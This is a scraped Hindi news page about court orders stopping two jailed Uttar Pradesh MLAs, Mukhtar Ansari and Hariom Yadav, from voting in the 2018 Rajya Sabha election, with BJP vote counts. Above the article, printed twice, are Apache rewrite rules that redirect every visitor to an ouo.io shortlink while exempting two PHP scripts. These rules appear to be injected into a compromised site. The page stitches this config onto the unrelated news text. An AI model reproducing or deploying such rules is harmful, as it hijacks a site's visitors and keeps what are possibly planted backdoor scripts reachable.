
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 400
लखनऊ। यूपी में कल होने वाले राज्यसभा चुनाव से ठीक पहले बीएसपी को बड़ा झटका लगा है। बीएसपी के बाहुबली विधायक मुख्तार अंसारी के राज्यसभा चुनाव में वोट देने पर इलाहाबाद हाईकोर्ट ने रोक लगा दी है। मुख्तार अंसारी हत्या के आरोप में बांदा जेल में बंद हैं। स्पेशल जज एससी एसटी गाजीपुर ने बीस मार्च को वोट देने की छूट दी थी। राज्य सरकार ने स्पेशल जज के आदेश को हाईकोर्ट में दी चुनौती थी। वहीं समाजवादी पार्टी के विधायक हरिओम यादव भी राज्यसभा चुनाव में वोट नहीं डाल पाएंगे, डीएम ने ये आदेश दिया है। हरिओम यादव फिरोजाबाद की जेल में बंद हैं। यूपी में राज्यसभा का चुनाव बेहद दिलचस्प हो गया है। बीजेपी के आठ उम्मीदवारों और समाजवादी पार्टी की जया बच्चन की जीत तो तय है। मामला बीजेपी के नौवें उम्मीदवार और बीएसपी के प्रत्याशी भीमराव अंबेडकर के बीच फंस गया है। 21 मार्च को डिनर के बहाने लखनऊ में देर रात तक बैठकें होती रहीं। यूपी के सीएम योगी आदित्यनाथ के घर पर बीजेपी के विधायकों को खाने पर बुलाया गया था। सहयोगी दल सुहेलदेव समाज पार्टी के अध्यक्ष ओमप्रकाश राजभर भी पहुंचे। उनके चार विधायक हैं। अमित शाह से मुलाक़ात के बाद राजभर के गिले शिकवे ख़त्म हो गए हैं। बीजेपी की सहयोगी पार्टी अपना दल के सभी नौ एमएलए भी योगी के घर मौजूद थे। हाल ही में बीजेपी में शामिल हुए नरेश अग्रवाल के विधायक बेटे नितिन भी पहुंचे। निर्दलीय बाहुबली विधायक अमनमणि त्रिपाठी ने सीएम योगी के पैर छू कर आशीर्वाद लिए। अरूण जेटली और अनिल जैन समेत बीजेपी के आठों उम्मीदवार आसानी से जीत जाएंगे। इसके बाद पार्टी के पास 28 विधायकों के वोट बचते हैं। जीतने के लिए 37 वोट चाहिए। नितिन और दो निर्दलीय एमएलए अमनमणि और विजय मिश्र को जोड़ दें तो संख्या 31 तक पहुंच जाती है।